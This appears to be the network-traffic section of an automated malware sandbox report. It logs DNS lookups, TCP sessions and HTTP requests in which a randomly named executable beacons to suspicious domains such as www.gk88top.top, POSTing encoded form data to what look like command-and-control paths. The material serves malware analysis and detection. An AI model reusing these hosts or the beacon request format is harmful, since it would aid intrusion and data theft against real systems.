                                                          Jan 11, 2025 03:33:28.987916946 CET4999080192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:30.006587982 CET4999180192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:30.011631012 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:30.011790991 CET4999180192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:30.021702051 CET4999180192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:30.026547909 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:30.621088982 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:30.621104002 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:30.621119022 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:30.621124029 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:30.621345043 CET4999180192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:30.625751019 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:30.625864029 CET4999180192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:30.626869917 CET4999180192.168.2.10217.70.184.50
                                                          Jan 11, 2025 03:33:30.631715059 CET8049991217.70.184.50192.168.2.10
                                                          Jan 11, 2025 03:33:36.107466936 CET4999280192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:36.112296104 CET804999213.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:36.112375975 CET4999280192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:36.127999067 CET4999280192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:36.132919073 CET804999213.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:37.057487011 CET804999213.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:37.057543039 CET804999213.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:37.057594061 CET4999280192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:37.649231911 CET4999280192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:38.663429976 CET4999380192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:38.669389963 CET804999313.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:38.669466972 CET4999380192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:38.683995008 CET4999380192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:38.691901922 CET804999313.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:39.608261108 CET804999313.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:39.608375072 CET804999313.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:39.608448982 CET4999380192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:40.190989017 CET4999380192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:41.210110903 CET4999480192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:41.215244055 CET804999413.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:41.215409040 CET4999480192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:41.231348038 CET4999480192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:41.236252069 CET804999413.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:41.236387968 CET804999413.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:42.183360100 CET804999413.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:42.183470011 CET804999413.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:42.183675051 CET4999480192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:42.737720966 CET4999480192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:43.756841898 CET4999580192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:43.761770010 CET804999513.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:43.762020111 CET4999580192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:43.774265051 CET4999580192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:43.779114008 CET804999513.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:44.702028990 CET804999513.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:44.702055931 CET804999513.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:44.702275991 CET4999580192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:44.704905987 CET4999580192.168.2.1013.228.81.39
                                                          Jan 11, 2025 03:33:44.709778070 CET804999513.228.81.39192.168.2.10
                                                          Jan 11, 2025 03:33:49.734831095 CET4999680192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:49.739759922 CET804999613.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:49.739825010 CET4999680192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:49.757082939 CET4999680192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:49.761939049 CET804999613.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:50.195827007 CET804999613.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:50.195965052 CET804999613.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:50.196022034 CET4999680192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:51.269041061 CET4999680192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:52.287779093 CET4999780192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:52.292819977 CET804999713.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:52.292938948 CET4999780192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:52.309338093 CET4999780192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:52.314188957 CET804999713.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:52.749594927 CET804999713.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:52.749679089 CET804999713.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:52.749758959 CET4999780192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:53.815834045 CET4999780192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:54.834853888 CET4999880192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:54.839859962 CET804999813.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:54.839947939 CET4999880192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:54.855760098 CET4999880192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:54.860616922 CET804999813.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:54.860750914 CET804999813.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:55.292889118 CET804999813.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:55.292913914 CET804999813.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:55.293008089 CET4999880192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:56.366095066 CET4999880192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:57.381843090 CET4999980192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:57.386900902 CET804999913.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:33:57.387536049 CET4999980192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:57.397439957 CET4999980192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:33:57.402308941 CET804999913.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:34:00.883013010 CET804999913.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:34:00.883265018 CET804999913.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:34:00.885210991 CET4999980192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:34:00.886198997 CET4999980192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:34:00.891079903 CET804999913.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:34:05.923348904 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:05.928292990 CET8050000104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:05.928365946 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:05.944127083 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:05.950649023 CET8050000104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:07.456559896 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:07.461674929 CET8050000104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:07.461724997 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.479496002 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.484611988 CET8050001104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:08.484716892 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.499474049 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.504347086 CET8050001104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:10.004417896 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:10.009852886 CET8050001104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:10.010005951 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.022528887 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.027811050 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:11.027949095 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.044168949 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.049073935 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:11.049170017 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:12.550349951 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:12.555607080 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:12.555702925 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.569391966 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.574484110 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:13.576576948 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.586146116 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.591120005 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:15.254126072 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:15.255140066 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:15.255213022 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:15.286483049 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:15.291341066 CET8050003104.21.64.1192.168.2.10

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 03:32:04.077500105 CET6368153192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:32:04.427534103 CET53636811.1.1.1192.168.2.10
                                                          Jan 11, 2025 03:32:20.460206985 CET5800853192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:32:20.786391020 CET53580081.1.1.1192.168.2.10
                                                          Jan 11, 2025 03:32:34.553423882 CET5678953192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:32:34.897743940 CET53567891.1.1.1192.168.2.10
                                                          Jan 11, 2025 03:33:09.006859064 CET5971653192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:33:09.018439054 CET53597161.1.1.1192.168.2.10
                                                          Jan 11, 2025 03:33:22.290903091 CET6243953192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:33:22.354392052 CET53624391.1.1.1192.168.2.10
                                                          Jan 11, 2025 03:33:35.633029938 CET5943653192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:33:36.104785919 CET53594361.1.1.1192.168.2.10
                                                          Jan 11, 2025 03:33:49.714714050 CET5513453192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:33:49.732094049 CET53551341.1.1.1192.168.2.10
                                                          Jan 11, 2025 03:34:05.899688005 CET5119053192.168.2.101.1.1.1
                                                          Jan 11, 2025 03:34:05.911192894 CET53511901.1.1.1192.168.2.10

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 11, 2025 03:32:04.077500105 CET192.168.2.101.1.1.10x8b3Standard query (0)www.qqa79.topA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:32:20.460206985 CET192.168.2.101.1.1.10xa4f3Standard query (0)www.gk88top.topA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:32:34.553423882 CET192.168.2.101.1.1.10x5bb9Standard query (0)www.127358.winA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:09.006859064 CET192.168.2.101.1.1.10xee86Standard query (0)www.infohive.websiteA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:22.290903091 CET192.168.2.101.1.1.10x5d89Standard query (0)www.sunnyz.storeA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:35.633029938 CET192.168.2.101.1.1.10xb371Standard query (0)www.muasamgiare.clickA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:49.714714050 CET192.168.2.101.1.1.10x2d2fStandard query (0)www.sfantulandrei.infoA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.899688005 CET192.168.2.101.1.1.10xa454Standard query (0)www.mffnow.infoA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 11, 2025 03:32:04.427534103 CET1.1.1.1192.168.2.100x8b3No error (0)www.qqa79.topqqa79.topCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 03:32:04.427534103 CET1.1.1.1192.168.2.100x8b3No error (0)qqa79.top38.47.233.21A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:32:20.786391020 CET1.1.1.1192.168.2.100xa4f3No error (0)www.gk88top.top172.67.137.47A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:32:20.786391020 CET1.1.1.1192.168.2.100xa4f3No error (0)www.gk88top.top104.21.7.187A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:32:34.897743940 CET1.1.1.1192.168.2.100x5bb9No error (0)www.127358.win206.238.89.119A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:09.018439054 CET1.1.1.1192.168.2.100xee86No error (0)www.infohive.website66.29.149.46A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:22.354392052 CET1.1.1.1192.168.2.100x5d89No error (0)www.sunnyz.storewebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 03:33:22.354392052 CET1.1.1.1192.168.2.100x5d89No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:36.104785919 CET1.1.1.1192.168.2.100xb371No error (0)www.muasamgiare.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 03:33:36.104785919 CET1.1.1.1192.168.2.100xb371No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:36.104785919 CET1.1.1.1192.168.2.100xb371No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:49.732094049 CET1.1.1.1192.168.2.100x2d2fNo error (0)www.sfantulandrei.info13.248.169.48A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:33:49.732094049 CET1.1.1.1192.168.2.100x2d2fNo error (0)www.sfantulandrei.info76.223.54.146A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.911192894 CET1.1.1.1192.168.2.100xa454No error (0)www.mffnow.info104.21.64.1A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.911192894 CET1.1.1.1192.168.2.100xa454No error (0)www.mffnow.info104.21.16.1A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.911192894 CET1.1.1.1192.168.2.100xa454No error (0)www.mffnow.info104.21.96.1A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.911192894 CET1.1.1.1192.168.2.100xa454No error (0)www.mffnow.info104.21.80.1A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.911192894 CET1.1.1.1192.168.2.100xa454No error (0)www.mffnow.info104.21.32.1A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.911192894 CET1.1.1.1192.168.2.100xa454No error (0)www.mffnow.info104.21.48.1A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 03:34:05.911192894 CET1.1.1.1192.168.2.100xa454No error (0)www.mffnow.info104.21.112.1A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.qqa79.top
                                                          • www.gk88top.top
                                                          • www.127358.win
                                                          • www.infohive.website
                                                          • www.sunnyz.store
                                                          • www.muasamgiare.click
                                                          • www.sfantulandrei.info
                                                          • www.mffnow.info

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.104997438.47.233.21806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:04.449843884 CET578OUTGET /t67p/?WLtH=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ5swGMf6I8KHf6mMNpdMDm5G/Ryzlg==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.qqa79.top
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:32:05.334860086 CET691INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:32:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 548
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.1049975172.67.137.47806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:20.809668064 CET836OUTPOST /vjnn/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.gk88top.top
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.gk88top.top
                                                          Referer: http://www.gk88top.top/vjnn/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 62 5a 38 42 43 4a 48 4d 66 7a 6a 78 70 5a 43 4a 52 48 76 6c 69 66 46 31 4f 75 4f
                                                          Data Ascii: WLtH=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeubZ8BCJHMfzjxpZCJRHvlifF1OuO
                                                          Jan 11, 2025 03:32:21.841304064 CET974INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:32:21 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IAews4r%2BdV1W5zco7n%2BwOoWPqvUS27R9vQDvypA0Njm%2BYEyeAZ5GRXi61ICjcmeFS6e8V5auBVtWPy5LYDD%2FTaoHVdw8srkjYIy55pcNZrTXJyAKNLda%2FEFXcTsowfXTLg%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90017eec8f467c78-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=836&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.1049976172.67.137.47806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:23.354429007 CET860OUTPOST /vjnn/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.gk88top.top
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.gk88top.top
                                                          Referer: http://www.gk88top.top/vjnn/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 76 52 2f 35 70 39 4e 45 74 6f 77 76 64 57 6c 49 6f 70 70 62 37 5a 78 79 30 76 63 57 56 39 77 63 53 2f 41 70 32 32 44 4d 38 73 32 46 68 37 67 68 52 54 72 4d 50 4b 46 68 55 56 7a 62 62 68 41 5a 69 72 77 75 47 62 30 72 4a 6e 69 65 4e 54 43 4b 42 4f 52 6d 75 32 55 62 42 33 54 50 4e 33 4c 72 30 58 37 78 71 44 75 33 6c 42 6e 36 67 6b 4c 64 53 79 75 35 2b 49 30 4c 39 7a 59 68 42 4e 56 5a 37 33 2f 6f 6b 46 59 41 6d 34 32 56 44 4c 37 49 62 6b 6e 41 39 79 4a 62 63 4b 30 6c 4d 72 47 76 77 51 47 50 54 70 4e 51 3d 3d
                                                          Data Ascii: WLtH=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxvR/5p9NEtowvdWlIoppb7Zxy0vcWV9wcS/Ap22DM8s2Fh7ghRTrMPKFhUVzbbhAZirwuGb0rJnieNTCKBORmu2UbB3TPN3Lr0X7xqDu3lBn6gkLdSyu5+I0L9zYhBNVZ73/okFYAm42VDL7IbknA9yJbcK0lMrGvwQGPTpNQ==
                                                          Jan 11, 2025 03:32:24.371018887 CET974INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:32:24 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfufDZJLHbRNzoItasHbDw9Jz%2FsLEB7Lx98G1uiohN2AQvOx4wyEC15skc%2Fl2ZgwE27zKnjwAFJ%2FBzIH798R85lsLs%2FVRVrc6MX1LQZtu%2FvevMYJZZZtqwVkxZXLUhHgue8%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90017efc69fc1831-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=860&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
